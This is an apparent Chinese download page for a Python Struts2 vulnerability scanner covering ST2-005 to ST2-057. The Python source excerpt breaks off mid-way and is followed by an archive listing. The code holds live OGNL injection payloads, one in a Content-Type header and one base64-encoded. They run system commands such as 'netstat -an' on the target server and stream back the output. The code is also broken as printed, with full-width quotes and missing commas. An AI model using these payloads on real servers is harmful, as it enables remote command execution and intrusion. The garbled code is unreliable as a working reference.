struts漏洞检测工具

struts2 漏洞检测工具 ，快速检测struts命令执行漏洞，可批量。运行环境要求：MAC/Linux下的Python2、Python3 。支持ST2-005,ST2-008,ST2-009,ST2-013,ST2-016,ST2-019,ST2-020,ST2-devmode,ST2-032,ST2-033,ST2-037,ST2-045,ST2-046,ST2-048,ST2-052,ST2-053,ST2-057的漏洞检测

#!/usr/bin/env python
# coding=utf-8
# code by Lucifer
# Date 2017/10/22

import re
import sys
import socket
import base64
import httplib
import warnings
import requests
from termcolor import cprint
from urlparse import urlparse
warnings.filterwarnings（“ignore“）
reload（sys）
sys.setdefaultencoding（‘utf-8‘）
httplib.HTTPConnection._http_vsn = 10
httplib.HTTPConnection._http_vsn_str = ‘HTTP/1.0‘

#超时设置
TMOUT=10

headers = {
    “Accept“:“application/x-shockwave-flash image/gif image/x-xbitmap image/jpeg image/pjpeg application/vnd.ms-excel application/vnd.ms-powerpoint application/msword */*“
    “User-Agent“:“Mozilla/5.0 （Macintosh; U; Intel Mac OS X 10_6_8; en-us） AppleWebKit/534.50 （KHTML like Gecko） Version/5.1 Safari/534.50“ 
    “Content-Type“:“application/x-www-form-urlencoded“
}
headers2 = {
     “User-Agent“:“Mozilla/5.0 （Macintosh; U; Intel Mac OS X 10_6_8; en-us） AppleWebKit/534.50 （KHTML like Gecko） Version/5.1 Safari/534.50“
     “Accept“:“application/x-shockwave-flash image/gif image/x-xbitmap image/jpeg image/pjpeg application/vnd.ms-excel application/vnd.ms-powerpoint application/msword */*“
     “Content-Type“:“%{（#nike=‘multipart/form-data‘）.（#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS）.（#_memberAccess?（#_memberAccess=#dm）:（（#container=#context[‘com.opensymphony.xwork2.ActionContext.container‘]）.（#ognlUtil=#container.getInstance（@com.opensymphony.xwork2.ognl.OgnlUtil@class））.（#ognlUtil.getExcludedPackageNames（）.clear（））.（#ognlUtil.getExcludedClasses（）.clear（））.（#context.setMemberAccess（#dm））））.（#cmd=‘netstat -an‘）.（#iswin=（@java.lang.System@getProperty（‘os.name‘）.toLowerCase（）.contains（‘win‘）））.（#cmds=（#iswin?{‘cmd.exe‘‘/c‘#cmd}:{‘/bin/bash‘‘-c‘#cmd}））.（#p=new java.lang.ProcessBuilder（#cmds））.（#p.redirectErrorStream（true））.（#process=#p.start（））.（#ros=（@org.apache.struts2.ServletActionContext@getResponse（）.getOutputStream（）））.（@org.apache.commons.io.IOUtils@copy（#process.getInputStream（）#ros））.（#ros.flush（））}“
}
headers_052 = {
    “Accept“:“text/htmlapplication/xhtml+xmlapplication/xml;q=0.9*/*;q=0.8“
    “User-Agent“:“Mozilla/5.0 （Macintosh; U; Intel Mac OS X 10_6_8; en-us） AppleWebKit/534.50 （KHTML like Gecko） Version/5.1 Safari/534.50“ 
    “Content-Type“:“application/xml“
}
class struts_baseverify:
    def __init__（self url）:
        self.url = url
        self.poc = {
                “ST2-005“:base64.b64decode（“KCdcNDNfbWVtYmVyQWNjZXNzLmFsbG93U3RhdGljTWV0aG9kQWNjZXNzJykoYSk9dHJ1ZSYoYikoKCdcNDNjb250ZXh0W1wneHdvcmsuTWV0aG9kQWNjZXNzb3IuZGVueU1ldGhvZEV4ZWN1dGlvblwnXVw3NWZhbHNlJykoYikpJignXDQzYycpKCgnXDQzX21lbWJlckFjY2Vzcy5leGNsdWRlUHJvcGVydGllc1w3NUBqYXZhLnV0aWwuQ29sbGVjdGlvbnNARU1QVFlfU0VUJykoYykpJihnKSgoJ1w0M215Y21kXDc1XCduZXRzdGF0IC1hblwnJykoZCkpJihoKSgoJ1w0M215cmV0XDc1QGphdmEubGFuZy5SdW50aW1lQGdldFJ1bnRpbWUoKS5leGVjKFw0M215Y21kKScpKGQpKSYoaSkoKCdcNDNteWRhdFw3NW5ld1w0MGphdmEuaW8uRGF0YUlucHV0U3RyZWFtKFw0M215cmV0LmdldElucHV0U3RyZWFtKCkpJykoZCkpJihqKSgoJ1w0M215cmVzXDc1bmV3XDQwYnl0ZVs1MTAyMF0nKShkKS

 属性            大小     日期    时间   名称
----------- ---------  ---------- -----  ----
     目录           0  2018-09-05 10:46  struts-scan-master\
     文件        1331  2018-09-05 10:46  struts-scan-master\README.md
     目录           0  2018-09-05 10:46  struts-scan-master\images\
     文件      101622  2018-09-05 10:46  struts-scan-master\images\exp.png
     文件      429184  2018-09-05 10:46  struts-scan-master\images\poc.png
     文件     6551592  2018-09-05 10:46  struts-scan-master\struts-scan
     文件     5953600  2018-09-05 10:46  struts-scan-master\struts-scan.exe
     文件       49906  2018-09-05 10:46  struts-scan-master\struts-scan2.py
     文件         115  2018-11-07 10:14  struts-scan-master\start.bat
     文件       50061  2018-11-06 09:39  struts-scan-master\struts-scan3.py